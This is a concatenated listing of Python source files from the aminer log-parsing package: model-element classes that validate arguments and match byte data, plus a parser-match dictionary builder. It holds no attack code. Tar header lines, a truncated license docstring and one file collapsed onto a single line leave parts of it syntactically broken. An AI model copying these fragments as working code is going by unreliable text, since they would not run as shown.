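SIGN_TYPE_NONE = "none"
SIGN_TYPE_OPTIONAL = "optional"
SIGN_TYPE_MANDATORY = "mandatory"

PAD_TYPE_NONE = "none"
PAD_TYPE_ZERO = "zero"
PAD_TYPE_BLANK = "blank"

EXP_TYPE_NONE = "none"
EXP_TYPE_OPTIONAL = "optional"
EXP_TYPE_MANDATORY = "mandatory"


class ModelElementInterface(metaclass=abc.ABCMeta):
    """This is the superinterface of all model elements.

    The constructor accepts the union of all keyword arguments used by the concrete model elements, stores each
    one as an attribute of the same name and validates it. Derived attributes (start_characters, pad_characters,
    hex_regex) are computed here as well.
    """

    def __init__(self, element_id, **kwargs):
        """Initialize the ModelElement.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param date_format a byte string that represents the date format for parsing, see Python strptime
        specification for available formats. Supported format specifiers are:
            * %b: month name in current locale
            * %d: day in month, can be space or zero padded when followed by separator or at end of string.
            * %f: fraction of seconds (the digits after the ".")
            * %H: hours from 00 to 23
            * %M: minutes
            * %m: two digit month number
            * %S: seconds
            * %s: seconds since the epoch (1970-01-01)
            * %Y: 4 digit year number
            * %z: detect and parse timezone strings like UTC, CET, +0001, etc. automatically.
        Common formats are:
            * "%b %d %H:%M:%S" e.g. for "Nov 19 05:08:43"
            * "%d.%m.%YT%H:%M:%S" e.g. for "07.02.2019T11:40:00"
            * "%d.%m.%Y %H:%M:%S.%f" e.g. for "07.02.2019 11:40:00.123456"
            * "%d.%m.%Y %H:%M:%S%z" e.g. for "07.02.2019 11:40:00+0000" or "07.02.2019 11:40:00 UTC"
            * "%d.%m.%Y" e.g. for "07.02.2019"
            * "%H:%M:%S" e.g. for "11:40:23"
        @param time_zone the timezone for parsing the values or UTC when None.
        @param text_locale the locale to use for parsing the day, month names or None to use the default locale.
        The locale must be a tuple of (locale, encoding) or a string.
        @param start_year when parsing date records without any year information, assume this is the year of the
        first value parsed.
        @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also
        the current time of values has to be tracked. This value defines the window within that the time may jump
        between two matches. When not within that window, the value is still parsed, corrected to the most likely
        value but does not change the detection year.
        @param timestamp_scale scales the seconds in %s to get seconds (=1), milliseconds (=1000),
        microseconds (=1000000), etc.
        @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only
        digits are allowed, with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY
        the value must start with + or -.
        @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no
        padding is allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value.
        @param exponent_type defines the allowed types of exponential values. With EXP_TYPE_NONE no exponential
        values are allowed, EXP_TYPE_OPTIONAL allows exponential values and with EXP_TYPE_MANDATORY every value must
        contain exponential values.
        @param delimiter a non-escaped delimiter string to search for.
        @param escape a character to escape in the string.
        @param consume_delimiter True if the delimiter character should also be consumed.
        @param value_model the ModelElement which has to match the data.
        @param value_path the relative path to the target value from the value_model element on. When the path does
        not resolve to a value, this model element will not match. A path value of None indicates, that the match
        element of the value_model should be used directly.
        @param branch_model_dict a dictionary to select a branch for the value identified by value_path.
        @param default_branch when lookup in branch_model_dict fails, use this as default branch or fail when None.
        @param children a list of child elements to be iterated through.
        @param fixed_data the fixed byte string to match.
        @param wordlist the list of words to search for. If it does not fulfill the sorting criteria mentioned in
        the class documentation, an Exception will be raised.
        @param ipv6 if True, IPv6 addresses are parsed, IPv4 addresses are parsed otherwise.
        @param key_parser_dict a dictionary of all keys with the according parsers. If a key should be optional,
        the associated parser must start with the OptionalMatchModelElement. To allow every key in a JSON object
        use "key": "ALLOW_ALL". To allow only empty arrays - [] - use "key": "EMPTY_ARRAY". To allow only empty
        objects - {} - use "key": "EMPTY_OBJECT". To allow only empty strings - "" - use "key": "EMPTY_STRING".
        To allow all keys in an object for a parser use "ALLOW_ALL_KEYS": parser. To allow only null values use
        "key": "NULL_OBJECT".
        @param optional_key_prefix if some key starts with the optional_key_prefix it will be considered optional.
        @param nullable_key_prefix the value of this key may be null instead of any expected value.
        @param allow_all_fields unknown fields are skipped without parsing with any parsing model.
        @param optional_element the element to be optionally matched.
        @param repeated_element the MatchElement to be repeated in the data.
        @param min_repeat the minimum number of repeated matches of the repeated_element.
        @param max_repeat the maximum number of repeated matches of the repeated_element.
        @param upper_case if True, the letters of the hex alphabet are uppercase, otherwise they are lowercase.
        @param alphabet the allowed letters to match data.
        @param strict_mode if True all keys must be defined. The parser will fail if the log data has a json-key
        that is not defined in the key_parser_dict.
        @param ignore_null ignore json-keys with values "null".
        @param root_element the name of the root xml element.
        @param attribute_prefix this prefix indicates that the element is an attribute of the previous element.
        @param optional_attribute_prefix if some attribute starts with this prefix it will be considered optional.
        @param empty_allowed_prefix if an element starts with this prefix, it may be empty.
        @param xml_header_expected True if the xml header is expected.
        @raises TypeError when an argument has the wrong type.
        @raises ValueError when an argument is unknown, empty or otherwise out of range.
        @raises locale.Error when text_locale is not installed.
        """
        allowed_kwargs = [
            "date_format", "time_zone", "text_locale", "start_year", "max_time_jump_seconds", "value_sign_type", "value_pad_type",
            "exponent_type", "delimiter", "escape", "consume_delimiter", "value_model", "value_path", "branch_model_dict",
            "default_branch", "children", "fixed_data", "wordlist", "ipv6", "key_parser_dict", "optional_key_prefix",
            "nullable_key_prefix", "allow_all_fields", "optional_element", "repeated_element", "min_repeat", "max_repeat",
            "upper_case", "alphabet", "strict_mode", "ignore_null", "timestamp_scale", "root_element", "attribute_prefix",
            "optional_attribute_prefix", "empty_allowed_prefix", "xml_header_expected"
        ]
        # locals() holds self, element_id, kwargs and allowed_kwargs here, so the slice stores element_id and, as a
        # side effect, the kwargs dict itself as self.kwargs. Kept as-is in case subclasses rely on that attribute.
        for argument, value in list(locals().items())[1:-1]:  # skip self parameter and allowed_kwargs
            if value is not None:
                setattr(self, argument, value)
        for argument, value in kwargs.items():
            if argument not in allowed_kwargs:
                msg = f"Argument {argument} is unknown. Consider changing it or adding it to the allowed_kwargs list."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            setattr(self, argument, value)
        if not isinstance(element_id, str):
            msg = "element_id has to be of the type string."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(element_id) < 1:
            msg = "element_id must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if hasattr(self, "date_format"):
            if not isinstance(self.date_format, bytes):
                msg = "date_format has to be of the type bytes."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.date_format) <= 1:
                msg = "At least one date_format specifier must be defined."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "text_locale") and self.text_locale is not None:
            if not isinstance(self.text_locale, str) and not isinstance(self.text_locale, tuple):
                msg = "text_locale has to be of the type string or of the type tuple and have the length 2. (locale, encoding)"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if isinstance(self.text_locale, tuple) and len(self.text_locale) != 2:
                msg = "text_locale has to be of the type string or of the type tuple and have the length 2. (locale, encoding)"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            try:
                # setlocale() is process-global: every thread and every other model element sees the new locale.
                old_locale = locale.getlocale()
                if old_locale != self.text_locale:
                    locale.setlocale(locale.LC_ALL, self.text_locale)
                    msg = f"Changed time locale from {old_locale} to {self.text_locale}."
                    logging.getLogger(DEBUG_LOG_NAME).info(msg)
            except locale.Error as error:
                msg = f"text_locale {self.text_locale} is not installed!"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise locale.Error(msg) from error
        if hasattr(self, "start_year") and self.start_year is not None and (not isinstance(self.start_year, int) or isinstance(
                self.start_year, bool)):
            msg = "start_year has to be of the type integer."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "max_time_jump_seconds"):
            if not isinstance(self.max_time_jump_seconds, int) or isinstance(self.max_time_jump_seconds, bool):
                msg = "max_time_jump_seconds has to be of the type integer."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if self.max_time_jump_seconds <= 0:
                msg = "max_time_jump_seconds must not be lower than 1 second."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "value_sign_type"):
            if not isinstance(self.value_sign_type, str):
                msg = f"value_sign_type must be of type string. Current type: {type(self.value_sign_type)}"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            # start_characters is the set of byte values a number may begin with.
            if self.value_sign_type == SIGN_TYPE_NONE:
                self.start_characters = set(b"0123456789")
            elif self.value_sign_type == SIGN_TYPE_OPTIONAL:
                self.start_characters = set(b"-0123456789")
            elif self.value_sign_type == SIGN_TYPE_MANDATORY:
                self.start_characters = set(b"+-")
            else:
                msg = f"Invalid value_sign_type {self.value_sign_type}"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "value_pad_type"):
            self.pad_characters = b""
            if not isinstance(self.value_pad_type, str):
                msg = f"value_pad_type must be of type string. Current type: {type(self.value_pad_type)}"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if self.value_pad_type == PAD_TYPE_NONE:
                pass
            elif self.value_pad_type == PAD_TYPE_ZERO:
                self.pad_characters = b"0"
            elif self.value_pad_type == PAD_TYPE_BLANK:
                self.pad_characters = b" "
            else:
                msg = f"Invalid value_pad_type {self.value_pad_type}"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "exponent_type"):
            if not isinstance(self.exponent_type, str):
                msg = f"exponent_type must be of type string. Current type: {type(self.exponent_type)}"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if self.exponent_type not in [EXP_TYPE_NONE, EXP_TYPE_OPTIONAL, EXP_TYPE_MANDATORY]:
                msg = f"Invalid exponent_type {self.exponent_type}"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "delimiter"):
            if not isinstance(self.delimiter, bytes):
                msg = "delimiter has to be of the type bytes."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.delimiter) < 1:
                msg = "delimiter must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "escape") and self.escape is not None:
            if not isinstance(self.escape, bytes):
                msg = "escape has to be of the type bytes."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.escape) < 1:
                msg = "escape must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "consume_delimiter") and not isinstance(self.consume_delimiter, bool):
            msg = "consume_delimiter has to be of the type bool."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "value_model") and not isinstance(self.value_model, ModelElementInterface):
            msg = "value_model has to be of the type ModelElementInterface."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "value_path") and self.value_path is not None:
            if not isinstance(self.value_path, str):
                msg = "value_path has to be of the type string or None."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.value_path) < 1:
                msg = "value_path must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "branch_model_dict"):
            if not isinstance(self.branch_model_dict, dict):
                msg = "branch_model_dict has to be of the type dict."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            for val in self.branch_model_dict.values():
                if not isinstance(val, ModelElementInterface):
                    msg = "all branch_model_dict values have to be of the type ModelElementInterface."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
        if hasattr(self, "default_branch") and self.default_branch is not None and not isinstance(
                self.default_branch, ModelElementInterface):
            # The message used to claim "string or None", which contradicts the check above.
            msg = "default_branch has to be of the type ModelElementInterface or None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "children"):
            if not isinstance(self.children, list):
                # The message used to claim "string", which contradicts the check above.
                msg = "children has to be of the type list."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.children) < 1:
                msg = "children must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            for child in self.children:
                if not isinstance(child, ModelElementInterface):
                    msg = "all children have to be of the type ModelElementInterface."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
        if hasattr(self, "fixed_data"):
            if not isinstance(self.fixed_data, bytes):
                msg = "fixed_data has to be of the type byte string."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.fixed_data) < 1:
                msg = "fixed_data must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "wordlist"):
            if not isinstance(self.wordlist, list):
                msg = "wordlist has to be of the type list."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.wordlist) < 1:
                msg = "wordlist must have at least one element."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            for word in self.wordlist:
                if not isinstance(word, bytes):
                    msg = "words from the wordlist must be of the type bytes."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
            # A word that is a prefix of a later word would always win, making the later word unreachable.
            for test_pos, ref_word in enumerate(self.wordlist):
                for test_word in self.wordlist[test_pos + 1:]:
                    if test_word.startswith(ref_word):
                        msg = f"Word {repr(test_word)} would be shadowed by word {repr(ref_word)} at lower position"
                        logging.getLogger(DEBUG_LOG_NAME).error(msg)
                        raise ValueError(msg)
        if hasattr(self, "upper_case"):
            if not isinstance(self.upper_case, bool):
                msg = "upper_case has to be of the type bool."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if self.upper_case:
                self.hex_regex = re.compile(rb"[0-9A-F]+")
            else:
                self.hex_regex = re.compile(rb"[0-9a-f]+")
        if hasattr(self, "ipv6") and not isinstance(self.ipv6, bool):
            msg = "ipv6 has to be of the type bool."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "key_parser_dict") and not isinstance(self.key_parser_dict, dict):
            msg = "key_parser_dict has to be of the type dict."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "optional_key_prefix"):
            if not isinstance(self.optional_key_prefix, str):
                msg = "optional_key_prefix has to be of the type string."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.optional_key_prefix) < 1:
                msg = "optional_key_prefix must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "nullable_key_prefix"):
            if not isinstance(self.nullable_key_prefix, str):
                msg = "nullable_key_prefix has to be of the type string."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.nullable_key_prefix) < 1:
                msg = "nullable_key_prefix must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "optional_key_prefix") and hasattr(self, "nullable_key_prefix") and\
                self.optional_key_prefix == self.nullable_key_prefix:
            msg = "optional_key_prefix must not be the same as nullable_key_prefix!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if hasattr(self, "allow_all_fields") and not isinstance(self.allow_all_fields, bool):
            msg = "allow_all_fields has to be of the type bool."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "optional_element") and not isinstance(self.optional_element, ModelElementInterface):
            msg = "optional_element has to be of the type ModelElementInterface."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "repeated_element") and not isinstance(self.repeated_element, ModelElementInterface):
            msg = "repeated_element has to be of the type ModelElementInterface."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "min_repeat"):
            if not isinstance(self.min_repeat, int) or isinstance(self.min_repeat, bool):
                msg = "min_repeat has to be of the type integer."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if self.min_repeat < 0:
                msg = "min_repeat has to be >= 0."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "max_repeat"):
            if not isinstance(self.max_repeat, int) or isinstance(self.max_repeat, bool):
                msg = "max_repeat has to be of the type integer."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            # max_repeat may be given without min_repeat; the original raised AttributeError in that case.
            if self.max_repeat < 1 or getattr(self, "min_repeat", 0) > self.max_repeat:
                msg = "max_repeat has to be >= 1 and max_repeat has to be bigger than min_repeat."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "alphabet"):
            if not isinstance(self.alphabet, bytes):
                msg = "alphabet has to be of the type bytes."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.alphabet) < 1:
                msg = "alphabet must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "strict_mode") and not isinstance(self.strict_mode, bool):
            msg = "strict_mode has to be of the type bool."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "ignore_null") and not isinstance(self.ignore_null, bool):
            msg = "ignore_null has to be of the type bool."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "root_element"):
            if not isinstance(self.root_element, str):
                msg = "root_element has to be of the type string."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.root_element) < 1:
                msg = "root_element must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "attribute_prefix"):
            if not isinstance(self.attribute_prefix, str):
                msg = "attribute_prefix has to be of the type string."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.attribute_prefix) < 1:
                msg = "attribute_prefix must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "optional_attribute_prefix"):
            if not isinstance(self.optional_attribute_prefix, str):
                msg = "optional_attribute_prefix has to be of the type string."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.optional_attribute_prefix) < 1:
                msg = "optional_attribute_prefix must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        if hasattr(self, "empty_allowed_prefix"):
            if not isinstance(self.empty_allowed_prefix, str):
                msg = "empty_allowed_prefix has to be of the type string."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.empty_allowed_prefix) < 1:
                msg = "empty_allowed_prefix must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        # The three XML prefixes must be pairwise distinct, otherwise an element name could be classified two ways.
        if hasattr(self, "attribute_prefix") and hasattr(self, "optional_attribute_prefix") and\
                self.attribute_prefix == self.optional_attribute_prefix:
            msg = "attribute_prefix must not be the same as optional_attribute_prefix!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if hasattr(self, "attribute_prefix") and hasattr(self, "empty_allowed_prefix") and\
                self.attribute_prefix == self.empty_allowed_prefix:
            msg = "attribute_prefix must not be the same as empty_allowed_prefix!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if hasattr(self, "optional_attribute_prefix") and hasattr(self, "empty_allowed_prefix") and\
                self.empty_allowed_prefix == self.optional_attribute_prefix:
            msg = "optional_attribute_prefix must not be the same as empty_allowed_prefix!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if hasattr(self, "xml_header_expected") and not isinstance(self.xml_header_expected, bool):
            msg = "xml_header_expected has to be of the type bool."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    @abc.abstractmethod
    def get_match_element(self, path, match_context):
        """Try to find a match on given data for this model element and all its children.

        When a match is found, the match_context is updated accordingly.
        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against.
        @return the match_element or None if model did not match.
        """
OptionalMatchModelElement.py000066400000000000000000000044101500476301700361750ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing
"""This module defines a model element that is optional.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.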
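class OptionalMatchModelElement(ModelElementInterface):
    """Model element that tries to match one child element.

    When the child does not match, a zero-length match is returned instead of None, so an
    enclosing model (for example a SequenceModelElement) keeps going.
    """

    def __init__(self, element_id: str, optional_element: ModelElementInterface):
        """Initialize the ModelElement.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param optional_element the element to be optionally matched.
        """
        super().__init__(element_id, optional_element=optional_element)
        # Kept only for backwards compatibility with code that inspects this attribute;
        # get_match_element no longer hands this shared instance out (see there).
        self.empty_match_element = MatchElement(f"None/{self.element_id}", b"", None, None)

    def get_id(self):
        """Get the element ID."""
        return self.element_id

    def get_child_elements(self):
        """Return all optional elements."""
        return [self.optional_element]

    def get_match_element(self, path: str, match_context):
        """Try to match the optional child against the match_context.

        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against.
        @return a MatchElement for this element wrapping the child match, or a fresh zero-length
        MatchElement when the child did not match. A new object is created on every call: the
        earlier implementation returned one shared instance and overwrote its path, so two matches
        of the same element under different paths (e.g. inside a RepeatedElementDataModelElement)
        ended up as the same object carrying the last path.
        """
        current_path = f"{path}/{self.element_id}"
        start_data = match_context.match_data
        match = self.optional_element.get_match_element(current_path, match_context)
        if match is None:
            # Nothing is consumed here; the child is expected to have left match_context untouched.
            return MatchElement(current_path, b"", None, None)
        consumed = len(start_data) - len(match_context.match_data)
        matched = start_data[:consumed]
        return MatchElement(current_path, matched, matched, [match])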
class ParserMatch:
    """Objects of this class store information about a complete model match.

    Unlike the MatchElement, this class also provides fields to store information commonly used when dealing with the match,
    currently the lazily built path -> MatchElement dictionary (see get_match_dictionary).
    """

    def __init__(self, match_element: MatchElement):
        """Initialize the match.

        @param match_element the root MatchElement from the parsing process.
        @raises TypeError when match_element is not a MatchElement (the error is logged first).
        """
        if not isinstance(match_element, MatchElement):
            msg = "match_element has to be of the type MatchElement."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.match_element = match_element
        # Cache for get_match_dictionary; stays None until first requested.
        self.match_dictionary = None

    def get_match_element(self) -> MatchElement:
        """Return the root MatchElement this match was created from."""
        return self.match_element

    def get_match_dictionary(self) -> dict:
        """Return a dictionary mapping the path of every element in the match tree to that element.

        The tree is walked with an explicit stack of sibling lists rather than by recursion. Siblings
        that share the same path get an index suffix ("path/0", "path/1", ...) and the plain path then
        maps to the list of those siblings; a sibling whose match_object equals an earlier sibling's
        (same type and value) reuses that sibling's index and replaces it under that key. The result
        is cached on the instance after the first call.
        @return the path -> MatchElement (or list of MatchElements) dictionary.
        """
        if self.match_dictionary is not None:
            return self.match_dictionary
        stack = deque()
        stack.append([self.match_element])
        result_dict = {}
        while stack:
            match_list = stack.pop()
            # First pass: counter_dict[path] becomes 0 (and result_dict[path] an empty list) for paths
            # occurring more than once in this sibling list, None for paths occurring once.
            counter_dict = {}
            for test_match in match_list:
                if test_match.path in counter_dict.keys():
                    counter_dict[test_match.path] = 0
                    result_dict[test_match.path] = []
                else:
                    counter_dict[test_match.path] = None
            # Second pass: store each sibling, indexing the duplicated paths.
            # NOTE(review): block structure below was reconstructed from a collapsed listing — confirm
            # that the append belongs to the StopIteration branch.
            for test_match in match_list:
                path = test_match.path
                if counter_dict[path] is not None:
                    try:
                        # Reuse the index of an earlier sibling whose match_object has the same type and value.
                        pos = next(i for i, x in enumerate(result_dict[test_match.path]) if not isinstance(x, list) and isinstance(
                            test_match.match_object, type(x.match_object)) and test_match.match_object == x.match_object)
                        path += f"/{pos}"
                    except StopIteration:
                        # New value under this path: take the next free index.
                        path += "/%d" % counter_dict[path]
                        counter_dict[test_match.path] += 1
                        result_dict[test_match.path].append(test_match)
                result_dict[path] = test_match
                children = test_match.children
                if children is not None:
                    stack.append(children)
        self.match_dictionary = result_dict
        return result_dict

    def __str__(self) -> str:
        """Render the match via MatchElement.annotate_match for debugging output."""
        return f'ParserMatch: {self.match_element.annotate_match(" ")}'
class RepeatedElementDataModelElement(ModelElementInterface):
    """Model element that matches a run of consecutive matches of one child element."""

    def __init__(self, element_id: str, repeated_element: ModelElementInterface, min_repeat: int = 1, max_repeat: int = 0x100000):
        """Initialize the ModelElement.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param repeated_element the MatchElement to be repeated in the data.
        @param min_repeat the minimum number of repeated matches of the repeated_element.
        @param max_repeat the maximum number of repeated matches of the repeated_element.
        """
        super().__init__(element_id, repeated_element=repeated_element, min_repeat=min_repeat, max_repeat=max_repeat)

    def get_match_element(self, path, match_context):
        """Match the child element as often as it matches, up to max_repeat + 1 attempts.

        @param path the model path of the parent element.
        @param match_context the MatchContext whose data is consumed by the child matches.
        @return a MatchElement holding the child matches (child paths are numbered 0, 1, ...), or None
        when fewer than min_repeat or more than max_repeat matches were found; then match_context.match_data
        is reset to its value on entry.
        """
        current_path = f"{path}/{self.element_id}"
        start_data = match_context.match_data
        child_matches = []
        # One attempt beyond max_repeat so that an over-long run is detected and rejected below.
        for index in range(self.max_repeat + 1):
            child = self.repeated_element.get_match_element(f"{current_path}/{index}", match_context)
            if child is None:
                break
            child_matches.append(child)
        count = len(child_matches)
        if not self.min_repeat <= count <= self.max_repeat:
            match_context.match_data = start_data
            return None
        consumed = len(start_data) - len(match_context.match_data)
        matched = start_data[:consumed]
        return MatchElement(current_path, matched, matched, child_matches)
""" from typing import List from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class SequenceModelElement(ModelElementInterface): """This class defines an element to find matches that comprise matches of all given child model elements.""" def __init__(self, element_id: str, children: List["ModelElementInterface"]): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param children a list of child elements to be iterated through. """ super().__init__(element_id, children=children) def get_match_element(self, path, match_context): """Try to find a match on given data for this model element and all its children. When a match is found, the matchContext is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if model did not match. """ current_path = f"{path}/{self.element_id}" start_data = match_context.match_data matches = [] for child_element in self.children: child_match = child_element.get_match_element(current_path, match_context) if child_match is None: match_context.match_data = start_data return None matches += [child_match] return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)], start_data[:len(start_data) - len(match_context.match_data)], matches) VariableByteDataModelElement.py000066400000000000000000000036121500476301700366010ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element for a variable amount of bytes. 
class VariableByteDataModelElement(ModelElementInterface):
    """Model element matching the longest run of leading bytes that all belong to a fixed alphabet."""

    def __init__(self, element_id: str, alphabet: bytes):
        """Initialize the ModelElement.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param alphabet the allowed letters to match data.
        """
        super().__init__(element_id, alphabet=alphabet)

    def get_match_element(self, path, match_context):
        """Consume the longest prefix of the context data made up only of alphabet bytes.

        @param path the model path of the parent element.
        @param match_context the MatchContext whose match_data is inspected and, on success, advanced.
        @return a MatchElement covering that prefix, or None when the first byte is already outside
        the alphabet (or the data is empty).
        """
        data = match_context.match_data
        alphabet = self.alphabet
        # Offset of the first byte outside the alphabet; the whole data length if there is none.
        end = next((pos for pos, byte in enumerate(data) if byte not in alphabet), len(data))
        if end == 0:
            return None
        matched = data[:end]
        match_context.update(matched)
        return MatchElement(f"{path}/{self.element_id}", matched, matched, None)
class WhiteSpaceLimitedDataModelElement(ModelElementInterface):
    """Model element that consumes everything up to the next space or tab, or to the end of the data."""

    def get_match_element(self, path: str, match_context):
        """Consume all bytes before the first space or tab.

        Only b" " and b"\\t" end the match; other whitespace such as b"\\n" or b"\\r" is consumed like
        any other byte.
        @param path the model path of the parent element.
        @param match_context the MatchContext whose match_data is inspected and, on success, advanced.
        @return a MatchElement covering the consumed bytes, or None when nothing was consumed.
        """
        data = match_context.match_data
        total = len(data)
        length = 0
        while length < total and data[length] not in b" \t":
            length += 1
        if length == 0:
            return None
        matched = data[:length]
        match_context.update(matched)
        return MatchElement(f"{path}/{self.element_id}", matched, matched, None)
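def decode_xml(xml_string, obj=None, attribute_prefix="+"):
    """Decode an XML element tree into nested dicts, lists and strings recursively.

    @param xml_string an ElementTree element (despite the name, not a string), usually the root
    returned by defusedxml's fromstring.
    @param obj None on the top-level call. Internally it marks the recursion level: the first call
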